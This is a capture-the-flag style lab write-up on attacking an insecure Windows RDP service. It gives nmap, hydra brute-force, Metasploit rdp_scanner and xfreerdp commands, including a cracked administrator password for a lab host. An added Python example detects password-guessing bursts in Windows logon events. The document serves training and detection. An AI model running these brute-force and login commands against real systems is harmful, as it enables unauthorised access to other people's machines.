Windows: Insecure RDP Service

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machines will be accessible at demo.ine.local running a vulnerable RDP service.

Objective: Fingerprint the running RDP service, then exploit the vulnerability using the appropriate method and retrieve the flag.

Note: rdesktop will not work on this setup as it does not support NLA. Please use xfreerdp to connect to the RDP server.

Dictionaries to use:

  • /usr/share/metasploit-framework/data/wordlists/common_users.txt

  • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Tools

The best tools for this lab are:

  • Nmap

  • searchsploit

  • msfconsole

  • xfreerdp

Writeup

nmap -sSVC demo.ine.local
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt rdp://demo.ine.local -t 64 -s 3333
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set rhost demo.ine.local
set rport 3333
run
xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333
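
Seen from the defender's side, the hydra step above (64 parallel guesses followed by a working administrator logon) leaves a recognisable pattern in the Windows Security log. The following is an added example, not part of the original writeup: it flags a source address that produces a burst of failed logons (Event ID 4625) and then a successful one (Event ID 4624). The records, addresses, threshold and function name are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def _at(second):
    return datetime(2024, 1, 1, 10, 0, second)

# Constructed sample records: (time, EventID, LogonType, account, source IP).
# 4625 = failed logon, 4624 = successful logon. With NLA, RDP password checks
# are typically logged as LogonType 3; the desktop session is LogonType 10.
SAMPLE = (
    [(_at(s), 4625, 3, ("admin", "administrator", "guest")[s % 3], "192.0.2.10")
     for s in range(12)]
    + [(_at(12), 4624, 3, "administrator", "192.0.2.10"),
       (_at(13), 4624, 10, "administrator", "192.0.2.10"),
       # A user who mistyped a password twice: must not be flagged.
       (_at(20), 4625, 3, "alice", "198.51.100.7"),
       (_at(25), 4625, 3, "alice", "198.51.100.7"),
       (_at(30), 4624, 10, "alice", "198.51.100.7")]
)

def find_password_guessing(events, threshold=10, window=timedelta(seconds=60)):
    """Return sources with >= threshold failed logons inside window,
    plus any accounts that logged on from that source after the burst."""
    failures = defaultdict(list)   # source IP -> times of failed logons
    successes = defaultdict(list)  # source IP -> (time, account) of good logons
    for when, event_id, logon_type, account, src in sorted(events):
        if logon_type not in (3, 10):
            continue               # ignore local, service and batch logons
        if event_id == 4625:
            failures[src].append(when)
        elif event_id == 4624:
            successes[src].append((when, account))
    findings = []
    for src, times in failures.items():
        # Sliding window: time of the failure that first completes a burst.
        burst_at = next((times[i + threshold - 1]
                         for i in range(len(times) - threshold + 1)
                         if times[i + threshold - 1] - times[i] <= window), None)
        if burst_at is None:
            continue
        hit = sorted({acct for when, acct in successes[src] if when >= burst_at})
        findings.append({"source": src, "failures": len(times),
                         "accounts_logged_on": hit})
    return findings

if __name__ == "__main__":
    for finding in find_password_guessing(SAMPLE):
        print(finding)
```

A finding with a non-empty accounts_logged_on list is the case to escalate first: the guessing succeeded, as it does in this lab.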
